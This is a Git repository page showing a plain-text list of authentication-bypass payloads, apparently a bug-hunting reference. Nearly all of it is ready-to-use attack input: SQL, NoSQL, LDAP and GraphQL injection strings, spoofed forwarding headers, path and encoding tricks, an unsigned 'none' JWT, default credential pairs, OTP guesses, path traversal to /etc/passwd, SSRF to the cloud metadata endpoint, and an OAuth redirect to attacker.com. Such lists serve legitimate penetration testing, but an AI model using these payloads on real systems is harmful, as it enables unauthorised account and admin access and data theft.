0x5t4l1n/hunting
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/hunting.git synced 2026-05-26 19:36:33 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
copilot/add-vulnerabilities-and-payloads
hunting/Authentication-Bypass/auth-bypass-payloads.txt
T

271 lines
5.1 KiB
Plaintext
Raw Permalink Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
# Authentication Bypass Payloads
# SQL injection authentication bypass
admin' --
admin' #
admin'/*
' OR '1'='1' --
' OR 1=1--
admin' OR '1'='1
') OR ('1'='1
' OR 'x'='x
admin') OR ('1'='1'--
# NoSQL authentication bypass
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": "admin", "password": {"$gt": ""}}
{"username": {"$in": ["admin", "administrator"]}, "password": {"$gt": ""}}
# JSON payload manipulation
{"username":"admin","password":"admin","role":"admin"}
{"username":"admin","password":"wrong","isAdmin":true}
{"username":"admin","is_authenticated":true}
# Session manipulation
PHPSESSID=admin
session_id=00000000-0000-0000-0000-000000000001
token=admin_token
auth=true
# Parameter pollution
username=attacker&username=admin
user=normal&user=admin
# Cookie manipulation
admin=true
isAdmin=1
role=admin
authenticated=true
user_level=admin
# Header injection
X-Forwarded-For: 127.0.0.1
X-Original-URL: /admin
X-Rewrite-URL: /admin
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Host: localhost
X-Forwarded-Host: localhost
# URL path manipulation
/admin/..;/
/admin/%2e%2e%3b/
/./admin/./
/admin;/
/admin..
//admin//
/./admin/./panel
/%2e/admin
/admin/~
/admin#
/admin?
# HTTP verb tampering
GET /admin
POST /admin
HEAD /admin
PUT /admin
DELETE /admin
OPTIONS /admin
TRACE /admin
PATCH /admin
# Case manipulation
/Admin
/ADMIN
/AdMiN
/aDmIn
# Unicode bypass
/admin%c0%af
/admin%e0%80%af
/admin%c0%ae%c0%ae/
/%61dmin
# Double encoding
/%252e%252e%252fadmin
/%252e%252e/admin
# Null byte injection
/admin%00
/admin%00.html
/admin%00.jpg
# Credential stuffing patterns
admin:admin
administrator:administrator
root:root
admin:password
admin:123456
admin:admin123
test:test
guest:guest
user:user
demo:demo
# Default credentials bypass
username=admin&password=
username=&password=
username=admin&password=%20
username=admin&password=*
# Password reset bypass
email=victim@example.com&email=attacker@example.com
token=&email=attacker@example.com
token=0
token=null
token=false
# OTP/2FA bypass
otp=000000
otp=123456
otp=111111
otp=
otp=%20
otp=null
# Response manipulation
# Change HTTP response from 401/403 to 200
# Change "authenticated": false to "authenticated": true
# Change "role": "user" to "role": "admin"
# JWT manipulation (see JWT-Vulnerabilities for more)
Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
Authorization: Bearer null
Authorization: Bearer
Authorization:
# GraphQL authentication bypass
{"query":"mutation{login(username:\"admin\",password:\"' OR '1'='1\"){token}}"}
{"query":"{users{id username password}}"}
# XML authentication bypass
<user><username>admin</username><password>' OR '1'='1</password></user>
# LDAP authentication bypass
username=*
username=admin)(|(password=*
username=*)(uid=*))(|(uid=*
# OAuth/OIDC bypass
redirect_uri=https://attacker.com
state=
nonce=
code=
# API key bypass
api_key=
X-API-Key:
Authorization:
apikey=null
# Session fixation
PHPSESSID=attacker_controlled_session
jsessionid=12345
# CAPTCHA bypass
captcha=
g-recaptcha-response=
h-captcha-response=
captcha_response=03AAYGu2...
recaptcha=
# Rate limiting bypass
X-Forwarded-For: random_ip_each_request
X-Originating-IP: random_ip_each_request
X-Remote-IP: random_ip_each_request
# Account enumeration
username=admin&password=wrong
username=nonexistent&password=wrong
# Login form variations
user[admin]=1
user[role]=admin
username[]=admin
password[]=anything
# Time-based bypass
wait_for_rate_limit=true
timestamp=future_date
valid_until=9999999999
# Magic hashes (PHP type juggling)
# 0e215962017 == 0 (PHP)
# 0e291242476940776845150308577824 == 0
password=0e215962017
password=240610708
# Unicode normalization
username=ⓐⓓⓜⓘⓝ
username=𝒶𝒹𝓂𝒾𝓃
username=admin
# Homograph attack
username=αdmin (Greek alpha)
username=аdmin (Cyrillic а)
# Whitespace bypass
username= admin
username=admin
username=%20admin
username=admin%20
# Special characters
username=admin'
username=admin"
username=admin`
username=admin\
# Email bypass for authentication
email=admin@localhost
email=admin@127.0.0.1
email=@example.com
email=victim@attacker.com
# Host header authentication bypass
Host: localhost
Host: 127.0.0.1
Host: internal.company.com
# Referer bypass
Referer: https://trusted-site.com
Referer: https://localhost
# Origin bypass
Origin: https://trusted-site.com
Origin: null
# Authentication via GET instead of POST
GET /api/login?username=admin&password=admin123
# File inclusion for authentication bypass
/etc/passwd
../../../../../../etc/passwd
# SSRF to bypass authentication
url=http://localhost/admin
url=http://127.0.0.1/admin
url=http://169.254.169.254/latest/meta-data/
# Request smuggling for authentication bypass
Content-Length: 0
Transfer-Encoding: chunked
# Race conditions
# Send multiple authentication requests simultaneously
# Business logic bypass
step=1&step=3
status=pending&status=approved
verified=false&verified=true
# Broken authentication chain
# Skip step 2 in multi-step authentication
# Reuse old session tokens
# Replay old authentication requests
Reference in New Issue View Git Blame Copy Permalink